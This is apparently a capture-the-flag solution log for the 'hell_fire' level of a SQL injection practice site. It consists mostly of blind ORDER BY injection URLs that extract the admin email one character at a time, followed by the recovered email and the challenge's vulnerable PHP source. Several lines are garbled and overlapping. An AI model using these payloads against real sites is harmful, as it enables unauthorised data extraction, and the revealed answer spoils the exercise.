https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=113,id
27
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=114,id
28
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=115,id
29
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=116,id
30
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=117,id
31
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=118,id
32
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=119,id
33
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=120,id
34
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=121,id
35
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=122,id
36
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=65,id
37
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=66,id
38
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=67,id
39
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=68,id
40
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=69,id
41
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=70,id
42
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=71,id
43
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=72,id
44
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=73,id
45
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=74,id
46
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=75,id
47
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=76,id
48
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=77,id
49
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=78,id
50
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=79,id
51
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=80,id
52
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=81,id
53
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=82,id
54
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=83,id
55
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=84,id
56
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=85,id
57
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=86,id
58
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=87,id
59
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=88,id
60
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=89,id
61
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=90,id
62
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=33,id
63
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=34,id
64
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=35,id
65
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=36,id
66
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=37,id
67
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=38,id
68
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=39,id
69
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=40,id
70
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=41,id
71
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=42,id
72
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=43,id
73
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=44,id
74
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=45,id
75
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=46,id
76
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=47,id
77
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=58,id
78
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=59,id
79
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=60,id
80
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=61,id
81
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=62,id
82
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=63,id
83
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=64,id
84
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=91,id
85
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=92,id
86
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=93,id
87
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=94,id
88
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=95,id
89
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=96,idrd(right(left(email,28),1))=96,id
90                                                                                rd(right(left(email,28),1))=123,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=123,id                                                rd(right(left(email,28),1))=124,id
91
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=125,idrd(right(left(email,28),1))=124,id
92                                                                                rd(right(left(email,28),1))=126,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=125,id
93
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=126,id
94
28번째 패스워드 :m
pw :admin_secure_email@emai1.com

 

---

query : select id,email,score from prob_hell_fire where 1 order by

---

HELL_FIRE Clear!

<?php
  include "./config.php";
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\.|proc|union/i', $_GET[order])) exit("No Hack ~_~");
  $query = "select id,email,score from prob_hell_fire where 1 order by {$_GET[order]}";
  echo "<table border=1><tr><th>id</th><th>email</th><th>score</th>";
  $rows = mysqli_query($db,$query);
  while(($result = mysqli_fetch_array($rows))){
    if($result['id'] == "admin") $result['email'] = "**************";
    echo "<tr><td>{$result[id]}</td><td>{$result[email]}</td><td>{$result[score]}</td></tr>";
  }
  echo "</table><hr>query : <strong>{$query}</strong><hr>";

  $_GET[email] = addslashes($_GET[email]);
  $query = "select email from prob_hell_fire where id='admin' and email='{$_GET[email]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['email']) && ($result['email'] === $_GET['email'])) solve("hell_fire");
  highlight_file(__FILE__);
?>

 

Clear!!